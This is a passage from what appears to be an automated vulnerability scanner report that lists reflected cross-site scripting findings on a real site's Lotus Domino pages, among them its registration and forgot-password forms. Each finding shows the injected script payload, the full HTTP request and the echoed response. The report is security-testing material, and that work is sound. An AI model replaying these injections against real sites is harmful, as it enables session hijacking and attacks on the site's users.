Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader6ead7"><script>alert(1)</script>189951f7243/Content.nsf/Web+Landing+Page+Topics&Login">
...[SNIP]...

1.29. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31653"><script>alert(1)</script>cf47946228f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics31653"><script>alert(1)</script>cf47946228f HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:14 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13106
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics31653"><script>alert(1)</script>cf47946228f&Login">
...[SNIP]...

1.30. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7446"><script>alert(1)</script>5dbd569316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics?e7446"><script>alert(1)</script>5dbd569316=1 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13108
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics?e7446"><script>alert(1)</script>5dbd569316=1&Login">
...[SNIP]...

1.31. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f289"><script>alert(1)</script>1ef9c3a2abe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader8f289"><script>alert(1)</script>1ef9c3a2abe/Registration.nsf/Authentication+Details!OpenForm HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13119
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader8f289"><script>alert(1)</script>1ef9c3a2abe/Registration.nsf/Authentication+Details!OpenForm&Login">
...[SNIP]...

1.32. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1ba"><script>alert(1)</script>812d36c1a47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderff1ba"><script>alert(1)</script>812d36c1a47/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:11 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13118
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderff1ba"><script>alert(1)</script>812d36c1a47/Registration.nsf/Forgot Password!OpenForm&Seq=1&Login">
...[SNIP]...

1.33. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7502"><script>alert(1)</script>2b9714701fab81353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /KnowledgeLeadere7502"><script>alert(1)</script>2b9714701fab81353/Registration.nsf/Forgot%20Password!OpenForm&Seq=1?__Click=0&EMailAddress=%27%40%27.com&CatchCache=True&RedirectTo=%2F&FullName= HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm
Cache-Control: max-age=0
Origin: http://www.knowledgeleader.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13202
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeadere7502"><script>alert(1)</script>2b9714701fab81353/Registration.nsf/Forgot Password!OpenForm&Seq=1?__Click=0&EMailAddress=%27%40%27.com&CatchCache=True&RedirectTo=%2F&FullName=&Login">
...[SNIP]...

1.34. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot+Password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f155c"><script>alert(1)</script>2f191336a17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderf155c"><script>alert(1)</script>2f191336a17/Registration.nsf/Forgot+Password HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13103
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderf155c"><script>alert(1)</script>2f191336a17/Registration.nsf/Forgot+Password&Login">
...[SNIP]...

1.35. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05d3"><script>alert(1)</script>e0c30ae33c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderc05d3"><script>alert(1)</script>e0c30ae33c4/Registration.nsf/Forgot+Password!OpenForm HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13112
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderc05d3"><script>alert(1)</script>e0c30ae33c4/Registration.nsf/Forgot+Password!OpenForm&Login">
...[SNIP]...

1.36. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c203"><script>alert(1)</script>f4e50469339 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader4c203"><script>alert(1)</script>f4e50469339/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13144
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:59 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader4c203"><script>alert(1)</script>f4e50469339/Registration.nsf/Message!OpenForm&DisplayException Email Not FoundGeneric&Login">
...[SNIP]...

1.37. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e1"><script>alert(1)</script>1c7efda2e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader6f1e1"><script>alert(1)</script>1c7efda2e0/Registration.nsf/Registration HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:18 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13099
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader6f1e1"><script>alert(1)</script>1c7efda2e0/Registration.nsf/Registration&Login">
...[SNIP]...

1.38. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6fb7"><script>alert(1)</script>4e34599a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd6fb7"><script>alert(1)</script>4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:42:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13126
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:15 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderd6fb7"><script>alert(1)</script>4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial&Login">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E request parameter is copied into the HTML document as plain text between tags. The payload 5c4b1<script>alert(1)</script>48aa12f4d02 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E5c4b1<script>alert(1)</script>48aa12f4d02 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13260
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</script>4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E5c4b1<script>alert(1)</script>48aa12f4d02&Login">
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 16326(a)78de2712cce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C16326(a)78de2712cce/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13238
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<16326(a)78de2712cce/script>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac781"><script>alert(1)</script>846f6001970 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ac781"><script>alert(1)</script>846f6001970/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13209
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/ac781"><script>alert(1)</script>846f6001970/script>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45f48<script>alert(1)</script>1a83de8c55c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f45f48<script>alert(1)</script>1a83de8c55c/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:56:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13260
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:21:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
</script>4e34599a0f45f48<script>alert(1)</script>1a83de8c55c/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E&Login">
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

